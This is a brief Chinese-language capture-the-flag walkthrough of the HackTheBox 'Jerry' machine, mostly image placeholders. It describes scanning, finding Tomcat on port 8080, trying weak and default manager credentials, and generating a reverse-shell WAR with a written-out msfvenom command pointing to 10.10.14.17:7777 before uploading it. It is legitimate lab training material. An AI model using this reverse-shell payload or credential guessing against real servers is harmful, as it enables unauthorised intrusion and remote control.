Jerry - HackTheBox
Td

image

nmap扫描

image

image

image

就一个8080的tomcat端口,访问

image

image

猜一下弱口令

admin:admin跳转了

image

貌似不对

image

错误页面爆出了默认密码,尝试一下

image

msf生成一个反弹shell的war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f war -o shell.war

image

上传

image

image

没找到root.txt和user.txt,只有一个这个2 for the price of 1.txt

直接读取读不出来

image

用通配符读取一下

image